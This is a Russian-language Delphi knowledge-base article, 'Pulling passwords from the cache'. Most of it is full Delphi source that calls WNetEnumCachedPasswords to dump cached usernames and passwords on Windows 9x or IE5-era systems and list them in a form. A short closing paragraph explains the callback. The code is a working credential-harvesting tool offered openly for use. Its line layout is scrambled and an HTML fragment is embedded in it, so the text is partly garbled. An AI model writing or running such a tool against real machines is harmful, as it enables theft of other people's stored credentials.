Sources
Delphi Russian Knowledge Base
DRKB - это самая большая и удобная в использовании база знаний по Дельфи в рунете, составленная Виталием Невзоровым

Тянем пароли из кэша

01.01.2007
Так, сегодня мы рассмотрим как можно взять кэшированные пароли из 9x винды, а также из винды, где в установленном виде есть 5-я иешка (хотя может и 4-ой хватит:)

unit Unit1;
 
interface
 
uses
 
Windows, SysUtils, Classes, Forms, ShellAPI, Controls, StdCtrls;
 
type
    TForm1
= class(TForm)
    GroupBox1
: TGroupBox;
   
ListBox: TListBox;
    Label1
: TLabel;
    Label2
: TLabel;
    procedure Label1Click
(Sender: TObject);
    procedure
FormShow(Sender: TObject);
 
private
   
{ Private declarations }
 
public
   
{ Public declarations }
    hMPR
: THandle;
end;
 
// Отсюда мы можем заключить что должно валяться на форме,
// надеюсь вы сами всё закидаете, а если нет, то вам дорога в хелпы.
 
var
  Form1
: TForm1;
 
const
 
Count: Integer = 0;
 
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte;
PC
: PChar; dw: DWord): Word; stdcall;
 
implementation
{$R *.DFM}
 
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte;
PC
: PChar; dw: DWord): Word; external mpr name 'WNetEnumCachedPasswords';
 
// Объявляем функцию внешней, надеюсь вы поняли
// каким макаром, или вам опять в хелпы
 
type
 
PWinPassword = ^TWinPassword;
 
TWinPassword = record
 
EntrySize: Word;
 
ResourceSize: Word;
 
PasswordSize: Word;
 
EntryIndex: Byte;
 
EntryType: Byte;
 
PasswordC: Char;
end;
 
// Объявляем все типы, которые будем юзать в проге.
 
var
 
WinPassword: TWinPassword;
 
// Собственно переменные :-)
 
function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
 
Password: string;
  PC
: array[0..$FF] of Char;
begin
  inc
(Count);
 
// Увеличиваем число паролей на 1
 
Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
 
// Получаем в PC пароль
  PC
[WinPassword.ResourceSize] := #0;
 
CharToOem(PC, PC);
 
Password := StrPas(PC);
 
// После недолгих преобразований в Password имеем кэшированный логин
 
Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
 
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
  PC
[WinPassword.PasswordSize] := #0;< BR> CharToOem(PC, PC);
 
// Теперь в PC имеем пароль
 
Password := Password + ': ' + StrPas(PC);
 
// Разделяем логин и пароль двуеточием...
  Form1
.ListBox.Items.Add(Password);
 
// ...и добавляем в ListBox на форме
 
Result := True;
 
// Возвращаемся с положительным результатом
end;
 
procedure TForm1
.Label1Click(Sender: TObject);
begin
 
// при нажатии на лэйбл открываем окошко ие с нашим любимым сайтом :-)
 
ShellExecute(GetDesktopWindow, 'open', 'http://www.lamerov.net', nil, nil, 0);
end;
 
procedure TForm1
.FormShow(Sender: TObject);
begin
 
// А теперь сама процедура заполнения всех паролей.
 
if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then
 
// Если не найден кэшированый пароль, то
 
begin
   
Application.MessageBox('Cant load passwords: User is not logon.',
   
'Error', mb_Ok or mb_IconWarning);
   
Application.Terminate;
   
// Выдаем сообщение об этом
 
end
 
// иначе,
 
else
 
if Count = 0 then
   
// если паролей всего 0 то тоже об этом сообщаем
   
ListBox.Items.Add('No passwords found...');
end;
 
end.

Вы наверное спросите: как же все таки дельфи попадает туда куда нам нужно, то есть на функцию обработки паролей и почемы она кэшит их всех, хотя функцию вызывали всего одни раз, а очень просто. Помните строку WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) так вот она все и делает. Надеюсь вопросов не осталось.

https://delphiworld.narod.ru/

DelphiWorld 6.0